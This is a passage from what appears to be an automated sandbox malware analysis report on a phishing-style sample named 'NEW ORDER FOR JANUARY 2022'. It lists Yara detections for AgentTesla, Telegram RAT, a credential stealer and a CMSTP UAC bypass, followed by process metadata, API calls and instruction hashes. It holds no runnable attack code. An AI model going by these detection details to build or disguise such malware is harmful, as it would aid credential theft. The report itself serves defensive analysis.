                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, Author: Joe Security

                              General

                              Start time:05:33:09
                              Start date:14/01/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                              Imagebase:0xbe0000
                              File size:45160 bytes
                              MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                              Disassembly

                              Code Analysis


                                Execution Graph

                                Execution Coverage:14%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:82
                                Total number of Limit Nodes:4

                                Graph

                                [Execution graph: rendered node/edge graph not reproducible as text. Recoverable information: entry functions at 0x8114661 and 0x8115780 in the 0x8110000 memory dump; resolved API calls reached through the graph are CreateWindowExW, LoadLibraryExW, GetModuleHandleW and DuplicateHandle.]

                                Executed Functions

                                Control-flow Graph

                                [Control-flow graph of the function at 0x58144f0 (0x5810000 memory dump): rendered graph with Executed / Not Executed block colouring, not reproducible as text. Recoverable information: the function calls into 0x5814220, 0x5814be0/0x5814bf0, 0x5814e48/0x5814e58 and 0x58168a0/0x58168b0, and recursively into itself via 0x5814800, 0x5814a2d and 0x58144df.]
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: k@'
                                • API String ID: 0-984539097
                                • Opcode ID: dbc7207378a1edc3af8bc7e039a4eb9d2152e8491e934170b24a7baf5db54e47
                                • Instruction ID: 8e0ec6adb7a685e2f6712ece9cf8fe795a53207e4c9a5068707b2630ece17b98
                                • Opcode Fuzzy Hash: dbc7207378a1edc3af8bc7e039a4eb9d2152e8491e934170b24a7baf5db54e47
                                • Instruction Fuzzy Hash: 4F126C34B102098FCB14DF69D494AAEB7FABF89714B258469ED06EB361DB31DC01CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2b81b434b8328b30edf2d092b17964c5c878ab37e90aeec89df1000e3ee1a60
                                • Instruction ID: 1984592b1a990bd9199c4d438232f7c83419d96da9473b6b89fb000606207404
                                • Opcode Fuzzy Hash: c2b81b434b8328b30edf2d092b17964c5c878ab37e90aeec89df1000e3ee1a60
                                • Instruction Fuzzy Hash: 86823974A00614CFDB24DF28C884A69BBB6FF89304F1581A9D94ADB361DB31ED81CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d7a938509bbe85d7ebe65f245be5e0ae0173cc09b862068884ab36dcec0d587
                                • Instruction ID: cf688b3cba919027d0c02987705c4141cbc5a7ce8e41f4d238c602591cc702be
                                • Opcode Fuzzy Hash: 0d7a938509bbe85d7ebe65f245be5e0ae0173cc09b862068884ab36dcec0d587
                                • Instruction Fuzzy Hash: 32527AB1500706CFD718EF54E8881997BB3FB4AB28F905218C1626F6D8D3B465CADFA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cde0375e50892d11793ea499193c4d8bc0fb4b4984e89da536f087ac639a4dd4
                                • Instruction ID: dfc64043648af76fdf4a1f33bb1de43200b97f3bbdd3530b8aa4c927d1e98f81
                                • Opcode Fuzzy Hash: cde0375e50892d11793ea499193c4d8bc0fb4b4984e89da536f087ac639a4dd4
                                • Instruction Fuzzy Hash: 65B1D071B50109CBDF08CFA8DD966DDB7F2AF88311B24816AE416FB394DB799D028B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 82b0fe9d58ef263ec0145353428b1c148247345d5e9e0edb34a2cbb321e20e6e
                                • Instruction ID: 99a2fe8a4927078341d0b6cf8f8cf4b59324df314ca824a15bcfd615479b9d06
                                • Opcode Fuzzy Hash: 82b0fe9d58ef263ec0145353428b1c148247345d5e9e0edb34a2cbb321e20e6e
                                • Instruction Fuzzy Hash: 1FB1E071B501098BDF08CBA8DD966DDB7F2AF88311B24816AE406FB394DB799D028B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 5814e58; node/edge listing omitted)
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: #e
                                • API String ID: 0-1732277802
                                • Opcode ID: f6712468bf50ebfdaeab2bb9e11abb6f9df7c374207c2173241dcb02c2ad63d8
                                • Instruction ID: 09cb5d9bab54f8acfed70e1425da36408914458b0300221b427fcb8129c85813
                                • Opcode Fuzzy Hash: f6712468bf50ebfdaeab2bb9e11abb6f9df7c374207c2173241dcb02c2ad63d8
                                • Instruction Fuzzy Hash: 963259747046048FCB14DF39D498A6ABBF6FF89304B6584A9E906CB361DB30EC45CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 581ab18; node/edge listing omitted)
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 2419923b0f1836eca053af0e62c197a7ab837633ef14adfb6018419cfff454e3
                                • Instruction ID: 8190442369e52c0a39e5a753be6c4f1b1b1327acf79bbba2d264d9ebedc3fce4
                                • Opcode Fuzzy Hash: 2419923b0f1836eca053af0e62c197a7ab837633ef14adfb6018419cfff454e3
                                • Instruction Fuzzy Hash: CC229A316056068FCB24CF58C484DAABBF6FF84314B1AC669D959CB2A1E730FC55CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 811bda0; contains the GetModuleHandleW call node; node/edge listing omitted)
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0811BFF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: aae88109ee4cab82dbbb3352944757d7a5101fb92f5339b1e6c1b4c527094239
                                • Instruction ID: e6b2a5388f8a213938361be73cc9fc35b3a87bc0f836ed18c9f4007a7ee0bc54
                                • Opcode Fuzzy Hash: aae88109ee4cab82dbbb3352944757d7a5101fb92f5339b1e6c1b4c527094239
                                • Instruction Fuzzy Hash: C3812670A05B058FDB64DF29D040B9ABBF1BF88215F10892DD58AD7B50DB35E806CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 5813cf0; node/edge listing omitted)
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: cabcb569e6638011ebd2d5e392ea6245a8b76030db0b8760816bbb85714751ce
                                • Instruction ID: b5441e68110f75845843a22e8ce0bef41f97dae3f657806174177dee3faa936d
                                • Opcode Fuzzy Hash: cabcb569e6638011ebd2d5e392ea6245a8b76030db0b8760816bbb85714751ce
                                • Instruction Fuzzy Hash: B7025434B006058FDB20DF59C48496AB7F6FF88324B25CA69D95ADB761DB30EC42CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 581a3d8; node/edge listing omitted)
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: sZch^
                                • API String ID: 0-1042238138
                                • Opcode ID: 312a98100e5e9d75c29510fcd719fe4f3421646b6a67fdc1a231d86ae7c32b1c
                                • Instruction ID: 2f46eeec50ab25225775fed5236ec6a371f82d5b7ccaaf0bb1bc2af91fb28b6b
                                • Opcode Fuzzy Hash: 312a98100e5e9d75c29510fcd719fe4f3421646b6a67fdc1a231d86ae7c32b1c
                                • Instruction Fuzzy Hash: 71E19470B056068BCB15EF6CE451AAE73BAFF85608F508828DD16DB354EF34DD468B84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 811d724; contains the CreateWindowExW call node; node/edge listing omitted)
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0811E36A
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: f945c182ad624b3c967a5ff2fc9a3282b15ff70f0276828c513b24bf882db551
                                • Instruction ID: fb986ae60775954721a98f8268f4f896e9a3a177e57268f2d8c906635a70d214
                                • Opcode Fuzzy Hash: f945c182ad624b3c967a5ff2fc9a3282b15ff70f0276828c513b24bf882db551
                                • Instruction Fuzzy Hash: 1751AEB1D103099FDF14CFDAD884ADEBBB5BF48314F24862AE819AB210D7759985CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 81159a0; contains the DuplicateHandle call node; node/edge listing omitted)
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0811596E,?,?,?,?,?), ref: 08115A2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: db52a186dc4a162f37e5f12dd4dad9146ade89a5a9c30130c298e379956524ce
                                • Instruction ID: 42bb09a8b5b32aa67fccbf755b8cb00eb48f8c86a468b26df7c18ab71d594dca
                                • Opcode Fuzzy Hash: db52a186dc4a162f37e5f12dd4dad9146ade89a5a9c30130c298e379956524ce
                                • Instruction Fuzzy Hash: 463119B59002089FDB10CFA9E484ADEBFF5FB88325F14801AE915A3350D774A955CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 81153ec; contains the DuplicateHandle call node; node/edge listing omitted)
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0811596E,?,?,?,?,?), ref: 08115A2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: c5712d4bd6064caa5181f1cead3f6a8ce0f065edf75597e3deead6c79e56dfc3
                                • Instruction ID: d28c8b01f6b366e4af95c05aba3380fef38439122b722f1c77af68a72bca7b89
                                • Opcode Fuzzy Hash: c5712d4bd6064caa5181f1cead3f6a8ce0f065edf75597e3deead6c79e56dfc3
                                • Instruction Fuzzy Hash: 8721E3B59002089FDF10CFAAD884AEEBBF5EF48324F14842AE915B7310D774A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 811ace0; contains the LoadLibraryExW call node; node/edge listing omitted)
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0811C071,00000800,00000000,00000000), ref: 0811C262
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 7d18add862a62b06f8187bfe23cd48dc2c9da6a760ebefa174384044e1d73318
                                • Instruction ID: 8c879d6f50c065db597247ab80699f66a19d060a66fa07368e3334fc954c12fd
                                • Opcode Fuzzy Hash: 7d18add862a62b06f8187bfe23cd48dc2c9da6a760ebefa174384044e1d73318
                                • Instruction Fuzzy Hash: 6211F2B69002098BDB10CF9AD484A9EFBF4AB58710F10852ED919B7200C775A545CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 5815f70; node/edge listing omitted)
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 80bc7127447f1f104d63bf34b39aaaf49e1d85089c7251e598f20ff9d07cb75e
                                • Instruction ID: 64eb64b756f97f2cf90ef672789db7d420adcb20679abe0671099bf6016cd623
                                • Opcode Fuzzy Hash: 80bc7127447f1f104d63bf34b39aaaf49e1d85089c7251e598f20ff9d07cb75e
                                • Instruction Fuzzy Hash: BEC169346006028FCB14CF59D484D6ABBF6FF88314B26C958D99ACBA61EB30FC45CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 811bf90; contains the GetModuleHandleW call node; node/edge listing omitted)
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0811BFF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.740666494.0000000008110000.00000040.00000010.sdmp, Offset: 08110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8110000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: c2063b920ba8cfb4c25c582c23d3bc2664c141739b31a65fa74d70cf57857d17
                                • Instruction ID: 1f49de961c5c44a53ce988d19558f41b60fe6b575a8d54ea86b170f6fe66099c
                                • Opcode Fuzzy Hash: c2063b920ba8cfb4c25c582c23d3bc2664c141739b31a65fa74d70cf57857d17
                                • Instruction Fuzzy Hash: F6110FB6C006498FCB20CF9AD444BDEFBF4AF88224F10852AD429B7600C778A545CFA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph rendering not reproduced (entry block 5814e48; node/edge listing omitted)
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: #e
                                • API String ID: 0-1732277802
                                • Opcode ID: ec6cdde2580992d48a10f5db2fbc499fa8c242c9649846d31b78745dd3f3be11
                                • Instruction ID: e83f43ed18f7560aecf57a1df20f6fec8f91355175981cf6c53e65e6fdffc439
                                • Opcode Fuzzy Hash: ec6cdde2580992d48a10f5db2fbc499fa8c242c9649846d31b78745dd3f3be11
                                • Instruction Fuzzy Hash: C5B118347006048FCB14DF79D498A6ABBF6FF89604B2584A9E946DB3B1DB30ED05CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Control-flow graph for the function starting at 176ed00 in memory dump 01760000 (graph rendering not reproduced in this text extract).
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: 4ee33cb85423b1d0ae48880c77029deaf3ccf432c5ec86efb9ba0a4f92150613
                                • Instruction ID: 99384d031b1084f5e93a37f316e6a05b2a0f194dec986a02cb91aac85179bd26
                                • Opcode Fuzzy Hash: 4ee33cb85423b1d0ae48880c77029deaf3ccf432c5ec86efb9ba0a4f92150613
                                • Instruction Fuzzy Hash: C9615B34A00A068FCB15CF59D4C08AAFBFAFF88310B55C569D91997656DB30FC55CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                Control-flow graph for the function starting at 5814800 in memory dump 05810000 (graph rendering not reproduced in this text extract).
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: k@'
                                • API String ID: 0-984539097
                                • Opcode ID: b84e4bcb9b8469bd409303525089d003d8528a2f77f2afacd78c3126efe4be7a
                                • Instruction ID: b3b5a87cd9c3423a327b0f1862c6ed72de25689924ac94ab6270229735fdd1a4
                                • Opcode Fuzzy Hash: b84e4bcb9b8469bd409303525089d003d8528a2f77f2afacd78c3126efe4be7a
                                • Instruction Fuzzy Hash: C151E634B102058FCB18DF69D498AAEB7F6BF89704B5584A9E906EB371DB31EC01CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: p\fk
                                • API String ID: 0-3323649189
                                • Opcode ID: bfe6ec7285da6d6cfeefca6c8f4d743bc38bb83b94ab4b6ef4a4975a28a24d36
                                • Instruction ID: 767dcffc26726979a041f4d4706685a4dae1a3e220d7414d159a787bb0cea6f8
                                • Opcode Fuzzy Hash: bfe6ec7285da6d6cfeefca6c8f4d743bc38bb83b94ab4b6ef4a4975a28a24d36
                                • Instruction Fuzzy Hash: 9E419075B002188FCB14EF78D490AAE77B7BFC8244B644429D802AB354DF35DC02CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: P@2l
                                • API String ID: 0-866591868
                                • Opcode ID: 337a6ae9c60488719384344deed7ac0260dc6c7f220654d91e23f0e73bc92788
                                • Instruction ID: 374933c97213100d0a3d5b3eddffdaceb4c7942f816e2058d9ef8f4876b71c1a
                                • Opcode Fuzzy Hash: 337a6ae9c60488719384344deed7ac0260dc6c7f220654d91e23f0e73bc92788
                                • Instruction Fuzzy Hash: BE31A075B002149FDB15DF74D4586AEB7F6AB89740F2845A9D802DB391DF34CC02CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: P@2l
                                • API String ID: 0-866591868
                                • Opcode ID: b6e26915f5a45d4c786cf0fb6b58683ecca54afdb62f369a5005a14c59fc72c8
                                • Instruction ID: 2ec0019f94c923245717be045bd3184d2ece84a7cfcbb55dbdafd87b7894f2bb
                                • Opcode Fuzzy Hash: b6e26915f5a45d4c786cf0fb6b58683ecca54afdb62f369a5005a14c59fc72c8
                                • Instruction Fuzzy Hash: 67219335B002048FDB15EB74D0286AEF7F6AB88640F244569D802DB385DF74CC02CBA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8f61e4422530cf92fbfa096242db825524ac9ae05e8f64e777929dc46373090f
                                • Instruction ID: abf4c6b36b8f558a19ec1c0a99f5c74d7d17f31af3110d33afe0ace8848afdc1
                                • Opcode Fuzzy Hash: 8f61e4422530cf92fbfa096242db825524ac9ae05e8f64e777929dc46373090f
                                • Instruction Fuzzy Hash: 26E11930B086018FDB269B7DB47462EBBEADF8615571640FACA16CB7A2DF35CC018752
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: acf55989eb04ca8305079ad167b19765a4213343be2b095e2c0e906b59fa5c29
                                • Instruction ID: 93478d764090fa7ea2e6ed97f6d22aa368f219f6f1e625f0884783c42eeea9e7
                                • Opcode Fuzzy Hash: acf55989eb04ca8305079ad167b19765a4213343be2b095e2c0e906b59fa5c29
                                • Instruction Fuzzy Hash: 7EF17E757002049FCB05DF68D848E69BBF6FF88314B1580A9E60A9B372DB36DC15DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9e5fb888d3e0d3fa9deb53cefcb1218599987ed29a12ee1a2bd57a5875fc9bf
                                • Instruction ID: 08dede579b852f16107c3bdae3b6229648c1261a205d146bb07890d05b9c2cff
                                • Opcode Fuzzy Hash: c9e5fb888d3e0d3fa9deb53cefcb1218599987ed29a12ee1a2bd57a5875fc9bf
                                • Instruction Fuzzy Hash: F1E117347105118FC714DF3DC598A2AB7EAAF8861871580A9EE0ACB775EF70EC02CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 59b30cf09f6b27c7a61086df4f8cd625d1e00889a77dee7b311459aa8d9aea94
                                • Instruction ID: d819586cab597c560f07c2c985bf6f90f74cec91d40e0ddefe96087ab1894cb7
